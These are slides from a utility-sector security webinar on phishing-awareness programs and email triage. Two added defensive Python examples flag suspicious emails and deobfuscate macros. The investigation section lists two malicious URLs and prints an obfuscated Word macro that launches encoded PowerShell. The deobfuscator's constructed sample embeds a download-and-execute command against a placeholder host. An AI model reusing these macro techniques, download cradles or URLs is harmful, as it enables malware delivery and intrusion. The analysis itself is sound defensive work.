MRO Security Advisory Council (SAC) Webinar
"A Tale of Two Phishing Programs"
Seth Bross, Enterprise Security Analyst, OGE Energy Corporation
Tammy Retzlaff, Consultant Information Security Analyst, American Transmission Company
Jamie Arndt, Senior Cyber Security Engineer, American Transmission Company
MRO Presentation, July 11, 2019
ATC – Phishing Program
Tammy Retzlaff, CISSP, CISM, CRISC, Information Security Analyst
atcllc.com
Who We Are
• ATC was founded in 2001 as a transmission-only utility serving the Upper Peninsula of Michigan, the eastern half of Wisconsin, and a small portion of Illinois.
• We manage almost 10,000 miles of high-voltage transmission lines and 568 substations.
• We have approximately 600 employees and roughly 1,800 contractors.
Where We've Been
In 2012 malicious email attacks were increasing almost daily…
– Employees unaware of the risk
– Leaders unaware of the risk
– No easy way to report suspected phishing emails
– Email investigations difficult and time consuming
• We knew we needed to do something…
How We Started
• Looked for ways to train our employees on the dangers of phishing
• Decided on the good behaviors we wanted to reinforce
• Researched the tools that were available to help us
• Gained buy-in from leaders
The Journey
• 2012 – purchased a tool to help us "phish" our employees
• 2013 – began running monthly scenarios
  – Immediate education
  – Easy ways to report
  – Focus on good behaviors – report, report, report
• 2016 – assessed the program from a Human Performance standpoint
• 2017 – corporate goal, tied to bonus
• 2018 – made improvements to the program
  – In-person conversations for repeat clickers
  – Retest for individuals who fell for the phish
Where We Are Today
• Read-and-discuss opportunity for all employees
• Quarterly prize drawings for reporters
• Departments challenge each other
• "Leader board"
• Catalyst to talk about security across the organization
Trends
• Reporting of phishing scenarios is trending upward
• Clicking on phishing scenarios is trending downward
Where We're Going
• Increasing difficulty of scenarios
• Targeted scenarios in addition to the monthly ones
• Tighter tie-in with Human Performance
Lessons Learned
• Leadership support of the program is key to its success
• Focusing on positive behaviors gets better buy-in than focusing on negative behaviors
• Partner with as many people in the organization as possible
• Deliver your message in person as often as possible
• Reinforce your message as often as possible
Internal Phishing Program
Seth Bross, CISSP, Systems Security Analyst
Company Overview
• Founded in 1902
• Around 3,000 active members (the company's term for employees)
• Our company works the entire electric stack, from generation and transmission to distribution.
Phishing Program Overview
• Every member receives a simulated phishing email once a month
• Training is provided when a member falls for a simulated phishing email
• Training is delivered automatically through our phishing/training vendor
• Simulated phishing emails come from the vendor and are based on real phishing emails
• All reported suspect emails are run through an automated verification system, and the reporter receives a response
Benefits
• Increased awareness of the types of emails that are "phishy"
• More contact between the business and Security
• Training can be provided immediately and tailored to the issue observed
• Reduced phishing attack surface
Automated Response to Submitted Emails
• By using SOAR we have drastically reduced the analyst hours needed to respond to reported emails
• Increased reporting capabilities
• More insight into the effectiveness of our tools
• The SOAR platform performs some of the analysis that would otherwise require manual examination
Forward Outlook
• SOAR (Security Orchestration, Automation and Response) improvements
• Increase the ability to integrate tools and use external input to drive automated response
• Reduce the time needed to analyze and respond to emails
• Further integrations between SOAR tools, email servers and endpoint protection tools
Lessons Learned
• Some people will feel "tricked" when they fail a test, and it can result in non-productive interactions
• Messaging must go out early and frequently to give employees time to understand the purpose of the tests and how they are used
• Make sure the security tests are used as a training opportunity, not as a stick
• Automate early, automate often
Simulated Phishing Email Example (screenshot slide; image not reproduced)
Detection Evasion (three screenshot slides; images not reproduced)
ATC – Manual Investigation
Jamie Arndt, Senior Cybersecurity Engineer
Spam
Malicious URLs
http://www.puynag-china.com/server/?email=[email here]
(the recipient's address is substituted into the email= parameter, so the landing page knows who clicked and can pre-fill a credential form)
Malicious Documents
https://luxur.club/wp-content/25ke-t65cr-eczyfts
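The OGE slides describe running every reported email through an automated verification step in a SOAR platform, and the ATC indicators above (a URL that carries the recipient's address, a document delivered from a web path) are exactly the kind of thing that first pass should pick up. The following Python script is an added example, not code from either company's SOAR playbook: it builds a constructed report message (the link reuses the `?email=` shape from the slide with a made-up recipient filled in; the attachment is a minimal in-memory OOXML zip that contains `word/vbaProject.bin`, which is what marks a Word file as macro-enabled regardless of its extension), then extracts URLs and attachments, checks for an address in a query parameter, a Reply-To/From domain mismatch and a VBA project stream, and returns a verdict. Sender addresses, file names and the `triage`/`has_vba_project` helpers are assumptions for illustration.

```python
import email
import hashlib
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage
from urllib.parse import parse_qs, urlsplit

URL_RE = re.compile(r"""https?://[^\s<>"']+""", re.I)


def build_sample_report():
    """Return a CONSTRUCTED reported message as raw bytes (not a real sample).

    The link reuses the '?email=' shape shown on the slide with the recipient
    filled in. The attachment is a minimal OOXML zip carrying
    word/vbaProject.bin, the stream that makes a Word file macro-enabled."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 fake OLE stream")
    msg = EmailMessage()
    msg["From"] = "billing@invoices.example.invalid"      # assumed sender
    msg["Reply-To"] = "collect@other.example.invalid"     # assumed, differs from From
    msg["To"] = "user@corp.example.invalid"               # assumed recipient
    msg["Subject"] = "Overdue invoice"
    msg.set_content(
        "Your invoice is overdue. Review it here:\n"
        "http://www.puynag-china.com/server/?email=user@corp.example.invalid\n"
        "The statement is attached.\n")
    msg.add_attachment(buf.getvalue(), maintype="application",
                       subtype="vnd.ms-word.document.macroEnabled.12",
                       filename="invoice.docm")
    return msg.as_bytes()


def has_vba_project(data):
    """True if the bytes are an OOXML zip that contains a VBA project stream."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            return any(n.lower().endswith("vbaproject.bin") for n in z.namelist())
    except zipfile.BadZipFile:
        return False


def triage(raw):
    """First-pass verdict on a reported message: collect URLs and attachment
    hashes, flag query parameters carrying an e-mail address (credential-phish
    pages tag the victim this way), a Reply-To domain that differs from the
    From domain, and macro-enabled Office attachments."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    recipients = {a.addr_spec.lower() for a in msg["To"].addresses} if msg["To"] else set()
    findings = []

    if msg["Reply-To"] and msg["From"]:
        reply_dom = msg["Reply-To"].addresses[0].domain.lower()
        from_dom = msg["From"].addresses[0].domain.lower()
        if reply_dom != from_dom:
            findings.append(("reply-to-domain-mismatch", str(msg["Reply-To"])))

    body = msg.get_body(preferencelist=("plain", "html"))
    urls = URL_RE.findall(body.get_content()) if body else []
    for url in urls:
        for values in parse_qs(urlsplit(url).query).values():
            for v in values:
                if "@" in v:
                    kind = ("url-tagged-with-recipient" if v.lower() in recipients
                            else "url-carries-email")
                    findings.append((kind, url))

    attachments = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""
        digest = hashlib.sha256(data).hexdigest()   # what an analyst would pivot on
        attachments.append((part.get_filename(), digest))
        if has_vba_project(data):
            findings.append(("macro-enabled-office", part.get_filename(), digest))

    return {"urls": urls, "attachments": attachments, "findings": findings,
            "verdict": "escalate" if findings else "no-automated-indicators"}


if __name__ == "__main__":
    for finding in triage(build_sample_report())["findings"]:
        print(finding)
```

The point of hashing every attachment and listing every URL, even when nothing fires, is that the same record becomes the response sent back to the reporter and the input for the next step (sandbox detonation, endpoint search for the hash), which is where the hours saved by automation come from.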
Obfuscated macros

    Sub autoopen()
    On Error Resume Next
    <snip>
    jQ1AA14 = (NoBUxo / Log(i1o1_wDG) - CXA_QU * Oct(177462578) - fC_4AoA - Log(bAAABA - MAw1XQUA / WQkAZ1 - 258583782))
    End If
    l_DDCAU (jAUUBx + "po" + FADAUk_ + "wersh" + QAAADDA + "ell -e " + YAGAAAQx + UAAcQACc + fACABAAX + dDZBAQoc + U4cADAxA + u_DAAGA)
    If YQUw_U = UBoABkAk Then
    lAxAAAC = 210690210 * Round(342763755) / wDUoQAUB - Tan(557511061 + UADAAAZ) * 370351941 + Hex(304503937 + CSng(oBAkAUA))
    <snip>
    End Sub

The arithmetic lines are junk that never affects execution (On Error Resume Next swallows any failure). The one line that matters is the call to l_DDCAU: the literals "po" + "wersh" + "ell -e " concatenate to powershell -e, and the variables appended after them hold the encoded argument.
Obfuscated macros (continued): the variables in the call resolve to the encoded argument

    l_DDCAU (jAUUBx + "po" + FADAUk_ + "wersh" + QAAADDA + "ell -e " + YAGAAAQx + UAAcQACc + fACABAAX + dDZBAQoc + U4cADAxA + u_DAAGA)

    Function dDZBAQoc ()
    <snip>
    SAAAkQAC = "LgAoACAAKABbAFMAVAByAGkAb . . ."
    <snip>
    bwcQAAAA = "tAGoATwBpAE4AJwAnACkAKAAgA . . ."
    <snip>
    dDZBAQoc = SAAAkQAC + bwcQAAAA + BAwAAoCA + . . .
    End Function

The -e (-EncodedCommand) argument is base64 of the script encoded as UTF-16LE. The visible start of the first chunk, LgAoACAAKABbAFMAVAByAGkAb, decodes to .( ([STri, the opening of a further-obfuscated PowerShell invocation. The chunks are only meaningful once joined in order: the split points need not fall on base64 or character boundaries, so a later chunk such as bwcQAAAA does not decode on its own.
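The manual step just described (collect the string assignments, resolve the concatenation in the call, pull out the -e argument and decode it as UTF-16LE base64) can be done mechanically. The Python below is an added example, not code from the presentation: the macro it parses is constructed to mimic the pattern on the slides, with identifiers borrowed from the slide but made-up values and a made-up embedded command (a download from a hypothetical example.invalid host). The `resolve` and `extract_encoded_command` helpers are assumptions for illustration; `decode_utf16_fragment` shows the same decode step on the truncated fragment visible on the slide.

```python
import base64
import re

# Constructed payload: what the made-up macro would run when triggered.
PLAINTEXT_COMMAND = ("IEX (New-Object Net.WebClient).DownloadString("
                     "'http://example.invalid/stage2.ps1')")
_B64 = base64.b64encode(PLAINTEXT_COMMAND.encode("utf-16le")).decode("ascii")

# Constructed macro mimicking the slide: junk arithmetic, the command line
# assembled from empty variables and literals, and the base64 blob split across
# two variables at an arbitrary offset, as the real sample does.
SAMPLE_MACRO = f'''
Sub autoopen()
    On Error Resume Next
    jQ1AA14 = (NoBUxo / Log(i1o1_wDG) - CXA_QU * Oct(177462578))
    jAUUBx = ""
    FADAUk_ = ""
    QAAADDA = ""
    l_DDCAU (jAUUBx + "po" + FADAUk_ + "wersh" + QAAADDA + "ell -e " + dDZBAQoc)
End Sub

Function dDZBAQoc()
    SAAAkQAC = "{_B64[:25]}"
    bwcQAAAA = "{_B64[25:]}"
    dDZBAQoc = SAAAkQAC + bwcQAAAA
End Function
'''

ASSIGN_RE = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$", re.M)
CALL_RE = re.compile(r"^\s*([A-Za-z_]\w*)\s*\((.+)\)\s*$", re.M)
# A VBA string literal ("" is an escaped quote) or an identifier, in source order.
TOKEN_RE = re.compile(r'"((?:[^"]|"")*)"|([A-Za-z_]\w*)')


def collect_assignments(macro):
    """Map every variable, and every function via its return assignment, to its RHS."""
    return {name: rhs for name, rhs in ASSIGN_RE.findall(macro)}


def resolve(expr, env, _seen=None):
    """Evaluate a concatenation expression: keep literals, look identifiers up
    recursively, ignore operators and numbers. Unknown names resolve to "" as an
    uninitialised Variant does; _seen guards against self-referential junk."""
    _seen = _seen or set()
    out = []
    for lit, name in TOKEN_RE.findall(expr):
        if name:
            if name in env and name not in _seen:
                out.append(resolve(env[name], env, _seen | {name}))
        else:
            out.append(lit.replace('""', '"'))
    return "".join(out)


def extract_encoded_command(macro):
    """Find the call whose resolved argument is a 'powershell -e' command line.
    Returns (command_line, decoded_script) or (None, None)."""
    env = collect_assignments(macro)
    for _func, arg in CALL_RE.findall(macro):
        cmd = resolve(arg, env)
        m = re.search(r"powershell\s+-e\w*\s+(\S+)", cmd, re.I)
        if m:
            return cmd, base64.b64decode(m.group(1)).decode("utf-16le")
    return None, None


def decode_utf16_fragment(b64):
    """Best-effort decode of a truncated chunk like the one on the slide: drop the
    incomplete trailing base64 quantum and any odd trailing byte."""
    usable = b64[: len(b64) - len(b64) % 4]
    raw = base64.b64decode(usable)
    return raw[: len(raw) - len(raw) % 2].decode("utf-16le", errors="replace")


if __name__ == "__main__":
    cmd, script = extract_encoded_command(SAMPLE_MACRO)
    print(cmd[:40] + "...")
    print(script)
    print(decode_utf16_fragment("LgAoACAAKABbAFMAVAByAGkAb"))
```

Resolving lazily from the call argument, rather than evaluating every assignment, is what keeps the junk arithmetic harmless: variables that are never referenced from the command line are never looked at.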